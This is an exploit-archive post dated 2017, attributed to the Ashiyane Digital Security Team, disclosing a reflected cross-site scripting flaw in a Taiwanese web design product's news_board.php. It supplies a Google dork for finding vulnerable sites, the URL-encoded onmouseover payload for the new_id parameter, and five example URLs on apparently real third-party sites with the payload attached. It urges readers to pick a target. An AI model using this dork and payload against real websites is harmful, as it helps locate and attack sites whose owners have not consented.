|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: 網頁設計 Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://www.letian99.com
|[+]
|[+] Google Dork: intext:"樂天台東民宿網" inurl:news_board.php
|[+]
|[+] Tested on: Win 10 / Mozilla Firefox
|[+]
|[+] Date: 2017 04 February
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search dork and choose a target and add "'%22%20onmouseover%3dprompt(955192)%20bad%3d%22" after URL!
|[+] To see Vulnerability!
|--------------------------------------------------------------|
|[+]
|[+] Examples :
|[+]
|[+] http://520.bnb9.com/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://ttbb.yesoks.com/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://t50.goodoks.com/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://smokeycat.oks.tw/en/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://brulee.oks.tw/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : modiret
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|